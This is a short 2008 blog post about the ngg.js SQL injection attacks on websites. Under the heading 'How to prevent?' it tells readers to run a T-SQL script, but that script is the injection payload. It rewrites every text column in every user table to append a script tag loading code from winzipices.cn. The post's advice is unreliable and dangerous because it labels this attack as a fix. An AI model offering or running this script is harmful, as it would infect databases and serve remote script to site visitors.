ngg.js

¬Article by Hariadi with 0 comments

22 Jul 2008

What is */ngg.js?

There seems to be a new wave of sql injections ending with ngg.js. Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India

How to prevent?

Open your SQL Tool Analyzer and type this:


DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://winzipices.cn/2.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Check your coding?

Download Scrawlr to find code vulnerability.

ASCII Encoded/Binary String Automated SQL Injection Attack
Preventing SQL Injections

Tags: SQL

Category: How-To, Security

Hariadi.Org

Hariadi.Org RSS

ngg.js

¬Article by Hariadi with 0 comments

What is */ngg.js?

How to prevent?

Check your coding?

Related

recent posts

recent comments

most commented article

pages

categories

archives

Promotion

blogroll

© Copyright Hariadi.Org

Google Chrome Tweaks, Themes, Addons, Plugins